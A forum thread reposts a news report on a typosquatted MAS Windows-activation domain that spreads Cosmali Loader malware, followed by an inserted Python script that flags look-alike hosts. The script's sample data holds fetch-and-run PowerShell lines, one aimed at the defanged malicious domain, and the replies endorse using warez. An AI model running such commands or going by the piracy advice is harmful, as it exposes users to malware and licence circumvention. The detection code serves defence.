Fake MAS Windows activation domain used to spread PowerShell malware | The Windows Forum

AFFASocial

  • December 24, 2025
  • 12:44 PM

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called 'cosmali loader' because you mistyped 'get.activated.win' as 'get.activate[.]win' when activating Windows in PowerShell.

The malware's panel is insecure and everyone viewing it has access to your computer.

Reinstall Windows and don't make the same mistake next time.

For proof that your computer is infected, check Task Manager and look for weird PowerShell processes.

Based on the reports, attackers have set up a look-alike domain, "get.activate[.]win," which closely resembles the legitimate one listed in the official MAS activation instructions, "get.activated.win."

Given that the difference between the two is a single character ("d"), the attackers bet on users mistyping the domain.

[Image: Warning message. Source: RussianPanda]

Security researcher RussianPanda discovered that the notifications are related to the open source Cosmali Loader malware, and could be related to similar pop-up notifications spotted by GDATA malware analyst Karsten Hahn.

RussianPanda told BleepingComputer that Cosmali Loader delivered cryptomining utilities and the XWorm remote access trojan (RAT).

Although it is unclear who pushed the warning messages to users, it is likely that a well-intended researcher gained access to the malware control panel and used it to inform users of the compromise.

MAS is an open-source collection of PowerShell scripts that automate the activation of Microsoft Windows and Microsoft Office using HWID activation, KMS emulation, and various bypasses (Ohook, TSforge).

The project is hosted on GitHub and is openly maintained. However, Microsoft sees it as a piracy tool that activates products without a purchased license using unauthorized methods that circumvent its licensing system.

The maintainers of the project also warned users of the campaign and urged them to check the commands they type before executing them.

Users are recommended to avoid executing remote code if they don't fully understand what it does, always test in a sandbox, and avoid retyping commands to minimize the risk of fetching dangerous payloads from typosquatted domains.

Unofficial Windows activators have been repeatedly used for malware delivery, so users need to be aware of the risks and exercise caution when using such tools.
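
The one-character look-alike described in the post above can be caught mechanically. The following is an added example, not part of the original post or the MAS project: it pulls hostnames out of download commands and flags any host that is within one edit of an allow-listed domain without being equal to it. The function names, the allow-list, and the sample command lines are assumptions constructed for illustration.

```python
import re

# Allow-list of expected download hosts (assumption: only the legitimate
# MAS host named in the article is listed here).
ALLOWED_HOSTS = {"get.activated.win"}

# Matches the host part of a URL; brackets are accepted so that defanged
# indicators such as "get.activate[.]win" are still picked up.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)", re.IGNORECASE)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert, delete, substitute), computed row by row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete from a
                           cur[j - 1] + 1,             # insert into a
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def extract_hosts(command: str) -> list:
    """Return lower-cased hostnames found in a command, undoing '[.]' defanging."""
    return [h.replace("[.]", ".").lower().rstrip(".")
            for h in HOST_RE.findall(command)]


def classify(command: str, max_distance: int = 1) -> list:
    """Return (host, verdict, nearest allowed host) for each URL host found."""
    results = []
    for host in extract_hosts(command):
        if host in ALLOWED_HOSTS:
            results.append((host, "allowed", host))
            continue
        nearest = min(ALLOWED_HOSTS, key=lambda good: edit_distance(host, good))
        near = edit_distance(host, nearest) <= max_distance
        results.append((host, "lookalike" if near else "unknown", nearest))
    return results


# Constructed sample command lines (not taken from any real log).
SAMPLE_COMMANDS = [
    "irm https://get.activated.win | iex",
    "irm https://get.activate[.]win | iex",
    "irm https://example.com/setup.ps1 | iex",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        print(line, "->", classify(line))
```

The same `classify` call can be run over PowerShell script-block logs or proxy logs; a "lookalike" verdict is the case worth alerting on, while "unknown" hosts need a separate allow-list policy.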
 
Yet another reason to test your downloads thoroughly; trust nothing unless it's from a trusted source. It looks like 2026 will be the year people try to take over systems, either to exploit or steal information. We've already seen individuals using Thumper's respected name to seed torrents with malicious content. Unless you're certain, examine warez carefully and use VirusTotal. Don't hesitate to ask for help with any issues you encounter. We're happy to assist (though not all of us are Photoshop experts!). Besides helping yourself, you're also providing a heads-up to fellow forum members, which is a great help to everyone.
 
NOOOO REALLLLLLYYY

(Faints in horror at the thought)

Got to love college kids trying to make a buck and failing.
 
